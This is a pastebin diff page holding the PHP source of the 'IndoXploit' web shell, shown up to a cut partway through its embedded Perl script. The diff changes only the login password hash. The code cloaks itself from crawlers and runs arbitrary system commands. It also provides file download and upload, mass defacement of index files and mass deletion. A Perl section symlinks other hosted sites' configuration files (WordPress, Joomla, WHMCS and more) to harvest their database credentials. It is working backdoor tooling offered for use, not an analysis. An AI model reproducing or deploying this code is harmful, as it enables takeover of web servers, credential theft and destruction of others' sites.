View difference between Paste ID: fMz6kWJ7 and nC6pWh5a
SHOW: | | - or go back to the newest paste.
1
<?php
2
session_start();
3
error_reporting(0);
4
set_time_limit(0);
5
@set_magic_quotes_runtime(0);
6
@clearstatcache();
7
@ini_set('error_log',NULL);
8
@ini_set('log_errors',0);
9
@ini_set('max_execution_time',0);
10
@ini_set('output_buffering',0);
11
@ini_set('display_errors', 0);
12
13-
$auth_pass = "7b4939a8af28c814f0c757bb10f40d3d"; // default: IndoXploit
13+
$auth_pass = "b0827661e907714e6ee9317d3d15e8ec"; // 7_14_7=48
14
$color = "#00ff00";
15
$default_action = 'FilesMan';
16
$default_use_ajax = true;
17
$default_charset = 'UTF-8';
18
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
19
    $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
20
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
21
        header('HTTP/1.0 404 Not Found');
22
        exit;
23
    }
24
}
25
26
function login_shell() {
27
?>
28
<html>
29
<head>
30
<title>IndoXploit</title>
31
<style type="text/css">
32
html {
33
	margin: 20px auto;
34
	background: #000000;
35
	color: green;
36
	text-align: center;
37
}
38
header {
39
	color: green;
40
	margin: 10px auto;
41
}
42
input[type=password] {
43
	width: 250px;
44
	height: 25px;
45
	color: red;
46
	background: #000000;
47
	border: 1px dotted green;
48
	padding: 5px;
49
	margin-left: 20px;
50
	text-align: center;
51
}
52
</style>
53
</head>
54
<center>
55
<header>
56
	<pre>
57
 ___________________________
58
< root@indoxploit:~# w00t??? >
59
 ---------------------------
60
   \         ,        ,
61
    \       /(        )`
62
     \      \ \___   / |
63
            /- _  `-/  '
64
           (/\/ \ \   /\
65
           / /   | `    \
66
           O O   ) /    |
67
           `-^--'`<     '
68
          (_.)  _  )   /
69
           `.___/`    /
70
             `-----' /
71
<----.     __ / __   \
72
<----|====O)))==) \) /====
73
<----'    `--' `.__,' \
74
             |        |
75
              \       /
76
        ______( (_  / \______
77
      ,'  ,-----'   |        \
78
      `--{__________)        \/
79
80
	</pre>
81
</header>
82
<form method="post">
83
<input type="password" name="pass">
84
</form>
85
<?php
86
exit;
87
}
88
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
89
    if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
90
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
91
    else
92
        login_shell();
93
if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
94
    @ob_clean();
95
    $file = $_GET['file'];
96
    header('Content-Description: File Transfer');
97
    header('Content-Type: application/octet-stream');
98
    header('Content-Disposition: attachment; filename="'.basename($file).'"');
99
    header('Expires: 0');
100
    header('Cache-Control: must-revalidate');
101
    header('Pragma: public');
102
    header('Content-Length: ' . filesize($file));
103
    readfile($file);
104
    exit;
105
}
106
?>
107
<html>
108
<head>
109
<title>IndoXploit</title>
110
<meta name='author' content='IndoXploit'>
111
<meta charset="UTF-8">
112
<style type='text/css'>
113
@import url(https://fonts.googleapis.com/css?family=Ubuntu);
114
html {
115
    background: #000000;
116
    color: #ffffff;
117
    font-family: 'Ubuntu';
118
	font-size: 13px;
119
	width: 100%;
120
}
121
li {
122
	display: inline;
123
	margin: 5px;
124
	padding: 5px;
125
}
126
table, th, td {
127
	border-collapse:collapse;
128
	font-family: Tahoma, Geneva, sans-serif;
129
	background: transparent;
130
	font-family: 'Ubuntu';
131
	font-size: 13px;
132
}
133
.table_home, .th_home, .td_home {
134
	border: 1px solid #ffffff;
135
}
136
th {
137
	padding: 10px;
138
}
139
a {
140
	color: #ffffff;
141
	text-decoration: none;
142
}
143
a:hover {
144
	color: gold;
145
	text-decoration: underline;
146
}
147
b {
148
	color: gold;
149
}
150
input[type=text], input[type=password],input[type=submit] {
151
	background: transparent; 
152
	color: #ffffff; 
153
	border: 1px solid #ffffff; 
154
	margin: 5px auto;
155
	padding-left: 5px;
156
	font-family: 'Ubuntu';
157
	font-size: 13px;
158
}
159
textarea {
160
	border: 1px solid #ffffff;
161
	width: 100%;
162
	height: 400px;
163
	padding-left: 5px;
164
	margin: 10px auto;
165
	resize: none;
166
	background: transparent;
167
	color: #ffffff;
168
	font-family: 'Ubuntu';
169
	font-size: 13px;
170
}
171
select {
172
	width: 152px;
173
	background: #000000; 
174
	color: lime; 
175
	border: 1px solid #ffffff; 
176
	margin: 5px auto;
177
	padding-left: 5px;
178
	font-family: 'Ubuntu';
179
	font-size: 13px;
180
}
181
option:hover {
182
	background: lime;
183
	color: #000000;
184
}
185
</style>
186
</head>
187
<?php
188
###############################################################################
189
// Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
190
// Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
191
// Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
192
// Tanpa kalian kita tidak akan BESAR seperti sekarang.
193
// Greetz: All Member IndoXploit. & all my friends.
194
###############################################################################
195
function w($dir,$perm) {
196
	if(!is_writable($dir)) {
197
		return "<font color=red>".$perm."</font>";
198
	} else {
199
		return "<font color=lime>".$perm."</font>";
200
	}
201
}
202
function r($dir,$perm) {
203
	if(!is_readable($dir)) {
204
		return "<font color=red>".$perm."</font>";
205
	} else {
206
		return "<font color=lime>".$perm."</font>";
207
	}
208
}
209
function exe($cmd) {
210
	if(function_exists('system')) { 		
211
		@ob_start(); 		
212
		@system($cmd); 		
213
		$buff = @ob_get_contents(); 		
214
		@ob_end_clean(); 		
215
		return $buff; 	
216
	} elseif(function_exists('exec')) { 		
217
		@exec($cmd,$results); 		
218
		$buff = ""; 		
219
		foreach($results as $result) { 			
220
			$buff .= $result; 		
221
		} return $buff; 	
222
	} elseif(function_exists('passthru')) { 		
223
		@ob_start(); 		
224
		@passthru($cmd); 		
225
		$buff = @ob_get_contents(); 		
226
		@ob_end_clean(); 		
227
		return $buff; 	
228
	} elseif(function_exists('shell_exec')) { 		
229
		$buff = @shell_exec($cmd); 		
230
		return $buff; 	
231
	} 
232
}
233
function perms($file){
234
	$perms = fileperms($file);
235
	if (($perms & 0xC000) == 0xC000) {
236
	// Socket
237
	$info = 's';
238
	} elseif (($perms & 0xA000) == 0xA000) {
239
	// Symbolic Link
240
	$info = 'l';
241
	} elseif (($perms & 0x8000) == 0x8000) {
242
	// Regular
243
	$info = '-';
244
	} elseif (($perms & 0x6000) == 0x6000) {
245
	// Block special
246
	$info = 'b';
247
	} elseif (($perms & 0x4000) == 0x4000) {
248
	// Directory
249
	$info = 'd';
250
	} elseif (($perms & 0x2000) == 0x2000) {
251
	// Character special
252
	$info = 'c';
253
	} elseif (($perms & 0x1000) == 0x1000) {
254
	// FIFO pipe
255
	$info = 'p';
256
	} else {
257
	// Unknown
258
	$info = 'u';
259
	}
260
		// Owner
261
	$info .= (($perms & 0x0100) ? 'r' : '-');
262
	$info .= (($perms & 0x0080) ? 'w' : '-');
263
	$info .= (($perms & 0x0040) ?
264
	(($perms & 0x0800) ? 's' : 'x' ) :
265
	(($perms & 0x0800) ? 'S' : '-'));
266
	// Group
267
	$info .= (($perms & 0x0020) ? 'r' : '-');
268
	$info .= (($perms & 0x0010) ? 'w' : '-');
269
	$info .= (($perms & 0x0008) ?
270
	(($perms & 0x0400) ? 's' : 'x' ) :
271
	(($perms & 0x0400) ? 'S' : '-'));
272
	// World
273
	$info .= (($perms & 0x0004) ? 'r' : '-');
274
	$info .= (($perms & 0x0002) ? 'w' : '-');
275
	$info .= (($perms & 0x0001) ?
276
	(($perms & 0x0200) ? 't' : 'x' ) :
277
	(($perms & 0x0200) ? 'T' : '-'));
278
	return $info;
279
}
280
function hdd($s) {
281
	if($s >= 1073741824)
282
	return sprintf('%1.2f',$s / 1073741824 ).' GB';
283
	elseif($s >= 1048576)
284
	return sprintf('%1.2f',$s / 1048576 ) .' MB';
285
	elseif($s >= 1024)
286
	return sprintf('%1.2f',$s / 1024 ) .' KB';
287
	else
288
	return $s .' B';
289
}
290
function ambilKata($param, $kata1, $kata2){
291
    if(strpos($param, $kata1) === FALSE) return FALSE;
292
    if(strpos($param, $kata2) === FALSE) return FALSE;
293
    $start = strpos($param, $kata1) + strlen($kata1);
294
    $end = strpos($param, $kata2, $start);
295
    $return = substr($param, $start, $end - $start);
296
    return $return;
297
}
298
function getsource($url) {
299
    $curl = curl_init($url);
300
    		curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
301
    		curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
302
    		curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
303
    		curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
304
    $content = curl_exec($curl);
305
    		curl_close($curl);
306
    return $content;
307
}
308
function bing($dork) {
309
	$npage = 1;
310
	$npages = 30000;
311
	$allLinks = array();
312
	$lll = array();
313
	while($npage <= $npages) {
314
	    $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
315
	    if($x) {
316
			preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
317
			foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
318
			$npage = $npage + 10;
319
			if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
320
		} else break;
321
	}
322
	$URLs = array();
323
	foreach($allLinks as $url){
324
	    $exp = explode("/", $url);
325
	    $URLs[] = $exp[2];
326
	}
327
	$array = array_filter($URLs);
328
	$array = array_unique($array);
329
 	$sss = count(array_unique($array));
330
	foreach($array as $domain) {
331
		echo $domain."\n";
332
	}
333
}
334
function reverse($url) {
335
	$ch = curl_init("http://domains.yougetsignal.com/domains.php");
336
		  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
337
		  curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
338
		  curl_setopt($ch, CURLOPT_HEADER, 0);
339
		  curl_setopt($ch, CURLOPT_POST, 1);
340
	$resp = curl_exec($ch);
341
	$resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
342
	$array = explode(",,", $resp);
343
	unset($array[0]);
344
	foreach($array as $lnk) {
345
		$lnk = "http://$lnk";
346
		$lnk = str_replace(",", "", $lnk);
347
		echo $lnk."\n";
348
		ob_flush();
349
		flush();
350
	}
351
		curl_close($ch);
352
}
353
if(get_magic_quotes_gpc()) {
354
	function idx_ss($array) {
355
		return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
356
	}
357
	$_POST = idx_ss($_POST);
358
	$_COOKIE = idx_ss($_COOKIE);
359
}
360
361
if(isset($_GET['dir'])) {
362
	$dir = $_GET['dir'];
363
	chdir($dir);
364
} else {
365
	$dir = getcwd();
366
}
367
$kernel = php_uname();
368
$ip = gethostbyname($_SERVER['HTTP_HOST']);
369
$dir = str_replace("\\","/",$dir);
370
$scdir = explode("/", $dir);
371
$freespace = hdd(disk_free_space("/"));
372
$total = hdd(disk_total_space("/"));
373
$used = $total - $freespace;
374
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
375
$ds = @ini_get("disable_functions");
376
$mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
377
$curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
378
$wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
379
$perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
380
$python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
381
$show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
382
if(!function_exists('posix_getegid')) {
383
	$user = @get_current_user();
384
	$uid = @getmyuid();
385
	$gid = @getmygid();
386
	$group = "?";
387
} else {
388
	$uid = @posix_getpwuid(posix_geteuid());
389
	$gid = @posix_getgrgid(posix_getegid());
390
	$user = $uid['name'];
391
	$uid = $uid['uid'];
392
	$group = $gid['name'];
393
	$gid = $gid['gid'];
394
}
395
echo "System: <font color=lime>".$kernel."</font><br>";
396
echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
397
echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
398
echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
399
echo "Safe Mode: $sm<br>";
400
echo "Disable Functions: $show_ds<br>";
401
echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
402
echo "Current DIR: ";
403
foreach($scdir as $c_dir => $cdir) {	
404
	echo "<a href='?dir=";
405
	for($i = 0; $i <= $c_dir; $i++) {
406
		echo $scdir[$i];
407
		if($i != $c_dir) {
408
		echo "/";
409
		}
410
	}
411
	echo "'>$cdir</a>/";
412
}
413
echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
414
echo "<hr>";
415
echo "<center>";
416
echo "<ul>";
417
echo "<li>[ <a href='?'>Home</a> ]</li>";
418
echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
419
echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
420
echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
421
echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
422
echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
423
echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
424
echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
425
echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
426
echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
427
echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
428
echo "<li>[ <a href='?dir=$dir&do=network'>network</a> ]</li>";
429
echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li><br>";
430
echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
431
echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
432
echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
433
echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
434
echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
435
echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
436
echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
437
echo "<li>[ <a style='color: red;' href='?logout=true'>Logout</a> ]</li>";
438
echo "</ul>";
439
echo "</center>";
440
echo "<hr>";
441
if($_GET['logout'] == true) {
442
	unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
443
	echo "<script>window.location='?';</script>";
444
} elseif($_GET['do'] == 'upload') {
445
	echo "<center>";
446
	if($_POST['upload']) {
447
		if($_POST['tipe_upload'] == 'biasa') {
448
			if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
449
				$act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
450
			} else {
451
				$act = "<font color=red>failed to upload file</font>";
452
			}
453
		} else {
454
			$root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
455
			$web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
456
			if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
457
				if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
458
					$act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
459
				} else {
460
					$act = "<font color=red>failed to upload file</font>";
461
				}
462
			} else {
463
				$act = "<font color=red>failed to upload file</font>";
464
			}
465
		}
466
	}
467
	echo "Upload File:
468
	<form method='post' enctype='multipart/form-data'>
469
	<input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ] 
470
	<input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
471
	<input type='file' name='ix_file'>
472
	<input type='submit' value='upload' name='upload'>
473
	</form>";
474
	echo $act;
475
	echo "</center>";
476
} elseif($_GET['do'] == 'cmd') {
477
	echo "<form method='post'>
478
	<font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
479
	<input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
480
	</form>";
481
	if($_POST['do_cmd']) {
482
		echo "<pre>".exe($_POST['cmd'])."</pre>";
483
	}
484
} elseif($_GET['do'] == 'mass_deface') {
485
	function sabun_massal($dir,$namafile,$isi_script) {
486
		if(is_writable($dir)) {
487
			$dira = scandir($dir);
488
			foreach($dira as $dirb) {
489
				$dirc = "$dir/$dirb";
490
				$lokasi = $dirc.'/'.$namafile;
491
				if($dirb === '.') {
492
					file_put_contents($lokasi, $isi_script);
493
				} elseif($dirb === '..') {
494
					file_put_contents($lokasi, $isi_script);
495
				} else {
496
					if(is_dir($dirc)) {
497
						if(is_writable($dirc)) {
498
							echo "[<font color=lime>DONE</font>] $lokasi<br>";
499
							file_put_contents($lokasi, $isi_script);
500
							$idx = sabun_massal($dirc,$namafile,$isi_script);
501
						}
502
					}
503
				}
504
			}
505
		}
506
	}
507
	function sabun_biasa($dir,$namafile,$isi_script) {
508
		if(is_writable($dir)) {
509
			$dira = scandir($dir);
510
			foreach($dira as $dirb) {
511
				$dirc = "$dir/$dirb";
512
				$lokasi = $dirc.'/'.$namafile;
513
				if($dirb === '.') {
514
					file_put_contents($lokasi, $isi_script);
515
				} elseif($dirb === '..') {
516
					file_put_contents($lokasi, $isi_script);
517
				} else {
518
					if(is_dir($dirc)) {
519
						if(is_writable($dirc)) {
520
							echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
521
							file_put_contents($lokasi, $isi_script);
522
						}
523
					}
524
				}
525
			}
526
		}
527
	}
528
	if($_POST['start']) {
529
		if($_POST['tipe_sabun'] == 'mahal') {
530
			echo "<div style='margin: 5px auto; padding: 5px'>";
531
			sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
532
			echo "</div>";
533
		} elseif($_POST['tipe_sabun'] == 'murah') {
534
			echo "<div style='margin: 5px auto; padding: 5px'>";
535
			sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
536
			echo "</div>";
537
		}
538
	} else {
539
	echo "<center>";
540
	echo "<form method='post'>
541
	<font style='text-decoration: underline;'>Tipe Sabun:</font><br>
542
	<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
543
	<font style='text-decoration: underline;'>Folder:</font><br>
544
	<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
545
	<font style='text-decoration: underline;'>Filename:</font><br>
546
	<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
547
	<font style='text-decoration: underline;'>Index File:</font><br>
548
	<textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
549
	<input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
550
	</form></center>";
551
	}
552
} elseif($_GET['do'] == 'mass_delete') {
553
	function hapus_massal($dir,$namafile) {
554
		if(is_writable($dir)) {
555
			$dira = scandir($dir);
556
			foreach($dira as $dirb) {
557
				$dirc = "$dir/$dirb";
558
				$lokasi = $dirc.'/'.$namafile;
559
				if($dirb === '.') {
560
					if(file_exists("$dir/$namafile")) {
561
						unlink("$dir/$namafile");
562
					}
563
				} elseif($dirb === '..') {
564
					if(file_exists("".dirname($dir)."/$namafile")) {
565
						unlink("".dirname($dir)."/$namafile");
566
					}
567
				} else {
568
					if(is_dir($dirc)) {
569
						if(is_writable($dirc)) {
570
							if(file_exists($lokasi)) {
571
								echo "[<font color=lime>DELETED</font>] $lokasi<br>";
572
								unlink($lokasi);
573
								$idx = hapus_massal($dirc,$namafile);
574
							}
575
						}
576
					}
577
				}
578
			}
579
		}
580
	}
581
	if($_POST['start']) {
582
		echo "<div style='margin: 5px auto; padding: 5px'>";
583
		hapus_massal($_POST['d_dir'], $_POST['d_file']);
584
		echo "</div>";
585
	} else {
586
	echo "<center>";
587
	echo "<form method='post'>
588
	<font style='text-decoration: underline;'>Folder:</font><br>
589
	<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
590
	<font style='text-decoration: underline;'>Filename:</font><br>
591
	<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
592
	<input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
593
	</form></center>";
594
	}
595
} elseif($_GET['do'] == 'config') {
596
	$idx = mkdir("idx_config", 0777);
597
	$isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
598
	$htc = fopen("idx_config/.htaccess","w");
599
	fwrite($htc, $isi_htc);
600
	fclose($htc);
601
	if(preg_match("/vhosts|vhost/", $dir)) {
602
		$link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
603
		$vhost = "#!/usr/bin/perl -I/usr/local/bandmin
opendir(my $dir , "/var/www/vhosts/");
foreach(sort readdir $dir) {
    my $isDir = 0;
    $isDir = 1 if -d $_;
$sitess = $_;


symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/configure.php',$sitess.'-shop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/os/includes/configure.php',$sitess.'-shop-os.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscom/includes/configure.php',$sitess.'-oscom.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerce/includes/configure.php',$sitess.'-oscommerce.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerces/includes/configure.php',$sitess.'-oscommerces.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/configure.php',$sitess.'-shop2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shopping/includes/configure.php',$sitess.'-shop-shopping.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sale/includes/configure.php',$sitess.'-sale.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/amember/config.inc.php',$sitess.'-amember.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.inc.php',$sitess.'-amember2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/members/configuration.php',$sitess.'-members.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/config.php',$sitess.'-forum.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/includes/config.php',$sitess.'-forums.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/conf.php',$sitess.'-5.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-4.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/WP/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/press/wp-config.php',$sitess.'-wp13-press.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/wp-config.php',$sitess.'-wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Wordpress/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/wp-config.php',$sitess.'-Wordpress-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/wp-config.php',$sitess.'-Wordpress-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress-blog.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress-beta.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blogs/wp-config.php',$sitess.'-Wordpress-blogs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/wp-config.php',$sitess.'-Wordpress-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/wp-config.php',$sitess.'-Wordpress-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/wp-config.php',$sitess.'-Wordpress-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/wp-config.php',$sitess.'-Wordpress-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/test/wp-config.php',$sitess.'-Wordpress-test.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joomla/configuration.php',$sitess.'-joomla2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/configuration.php',$sitess.'-joomla-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joo/configuration.php',$sitess.'-joo.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cms/configuration.php',$sitess.'-joomla-cms.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/configuration.php',$sitess.'-joomla-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/configuration.php',$sitess.'-joomla-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/configuration.php',$sitess.'-joomla-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/configuration.php',$sitess.'-joomla-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/configuration.php',$sitess.'-joomla-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/config.php',$sitess.'-vb~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb3/includes/config.php',$sitess.'-vb3~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/config.php',$sitess.'-vb1~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/class_core.php',$sitess.'-vbluttin~class_core.php.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/class_core.php',$sitess.'-vbluttin~class_core.php1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/class_core.php',$sitess.'-vbluttin~class_core.php2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm15.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/central/configuration.php',$sitess.'-whm-central.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/whmcs/configuration.php',$sitess.'-whm-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/WHMCS/configuration.php',$sitess.'-whm-WHMCS.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmc/WHM/configuration.php',$sitess.'-whmc-WHM.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmcs/configuration.php',$sitess.'-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/configuration.php',$sitess.'-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supp/configuration.php',$sitess.'-supp.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/configuration.php',$sitess.'-sucure.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whm/configuration.php',$sitess.'-sucure-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whmcs/configuration.php',$sitess.'-sucure-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cpanel/configuration.php',$sitess.'-cpanel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/panel/configuration.php',$sitess.'-panel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/configuration.php',$sitess.'-host.txt');
